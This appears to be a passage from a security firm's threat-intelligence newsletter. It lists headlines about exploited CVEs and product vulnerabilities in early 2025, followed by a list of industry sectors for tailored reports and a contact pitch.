159 CVEs Exploited in Q1 2025 — 28.3% Within 24 Hours of Disclosure
Enterprises change how they manage cyber risk
Microsoft Security Vulnerabilities Set Record High in 2024: BeyondTrust
Vulnerability Exploitation and Credential Theft Now Top Initial Access - Infosecurity Magazine
Attackers hit security device defects hard in 2024 | CyberScoop
Businesses Failing to Prevent Cyber Attacks, Says Report
Verizon's DBIR Reveals 34% Jump in Vulnerability Exploitation - Infosecurity Magazine
The Wiretap: Trump’s Cyber Security Agency Avoided A Near Disaster
Open Source and Container Security Are Fundamentally Broken - The New Stack
The splintering of a standard bug tracking system has begun • The Register
Exposed and unaware: The state of enterprise security in 2025 - Help Net Security
Why the MITRE CVE Database Scare Proves Multi-Source Vulnerability Intelligence Is Essential
Vulnerabilities
Cisco Webex bug lets hackers gain code execution via meeting links
SonicWall SMA VPN devices targeted in attacks since January
Windows NTLM Hash Flaw Targeted in Global Phishing Attacks | MSSP Alert
Eight days from patch to exploitation for Microsoft flaw • The Register
Apple Zero Days Under 'Sophisticated Attack,' but Details Lacking
Rootkit bypasses most Linux security detection | Cybernews
Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools
Zyxel RCE Vulnerability Allows Arbitrary Query Execution Without any Authentication
Highest-Risk Security Flaw Found in Commvault Backup Solutions - Infosecurity Magazine
Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) - Help Net Security
VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025 | CyberScoop
TP-Link Router Vulnerabilities Let Attackers Inject Malicious SQL Commands
Patch Now: NVIDIA Flaws Expose AI Models, Critical Infrastructure
ASUS Confirms Critical Flaw in AiCloud Routers; Users Urged to Update Firmware
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.